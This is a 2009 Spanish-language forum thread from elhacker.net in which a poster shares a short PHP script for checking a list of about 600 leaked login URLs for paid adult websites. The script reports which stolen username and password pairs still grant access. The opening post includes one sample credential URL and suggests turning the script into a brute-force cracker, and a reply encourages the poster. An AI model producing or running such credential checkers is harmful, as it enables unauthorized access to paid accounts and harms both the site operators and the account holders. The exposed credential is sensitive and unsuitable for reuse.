elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Probador de passwrods para webs
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Probador de passwrods para webs  (Leído 6,340 veces)
USUARIO_DE_SOFTWARE_LIBRE

Desconectado Desconectado

Mensajes: 274


Ver Perfil WWW
Probador de passwrods para webs
« en: 11 Abril 2009, 17:30 pm »

Hola. Me cruzé con un listado de 600 URL's con acceso a webs XXX pagas :P
Ejemplo de las URL's que tengo:
Código:
http://qlysp1oon:B4k71D8gj2@dominio.com/members/
Esa webs está protegida con autentificación básica del protocolo HTTP.
El usuario es "qlysp1oon" y la pass es "B4k71D8gj2", lo que está después de la "@" es la URL a la que se accederá si colocamos la pass correcta.
El problema es que en este listado hay muchas contraseñas que son incorrectas, entonces con un simple script en PHP podemos probar cada URL para saber si funciona :D

<?php
$a
=fopen("NOMBRE DEL ARCHIVO QUE CONTIENE URL'S""r");
$c="";
while(!
feof($a)){
   
$c.=fread($a1024);
}
fclose($a);

$urls=explode("\r\n"$c);
foreach(
$urls as $url){
   if(@
fopen($url"r")){
      echo 
"Esta URL es correcta: $url\n";
   }
}
?>

Debes poner el archivo de texto con las URLS en le mismo directorio que el script y escribir el nombre del listado en la primer línea, en donde se indica.
Nos mostrará cada URL que es correcta.
Modificando un poquito el code podemos hacer un crackeador de fuerza bruta o también muchas otras cosas útiles ;)

Saludos!


« Última modificación: 11 Abril 2009, 18:20 pm por marcolandia^^ » En línea

дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.110


Ver Perfil WWW
Re: Probador de passwrods para webs
« Respuesta #1 en: 11 Abril 2009, 22:25 pm »

Te la pongo mas dificl, haz un php que aparte de validar el formato, haz que valide si la cuenta tiene acceso  :P suerte y gracias por compartir el script. Deberías hacerlo funcion y colgarla más arriba en el thread de funciones.


En línea

USUARIO_DE_SOFTWARE_LIBRE

Desconectado Desconectado

Mensajes: 274


Ver Perfil WWW
Re: Probador de passwrods para webs
« Respuesta #2 en: 11 Abril 2009, 23:22 pm »

Te la pongo mas dificl, haz un php que aparte de validar el formato, haz que valide si la cuenta tiene acceso  :P suerte y gracias por compartir el script. Deberías hacerlo funcion y colgarla más arriba en el thread de funciones.
El script no valida el formato.
Lo que hace es intentar conectarse con las URLs que hay en un archivo de texto. Si pudo conectarse te lo dirá (claro que también debe ser correcta la contraseña y el usuario, en caso de requerir autentificación)..
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Fits.me, un probador virtual que ajusta la ropa a medida del comprador online
Noticias
wolfbcn 1 1,630 Último mensaje 30 Junio 2012, 03:33 am
por Graphixx
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines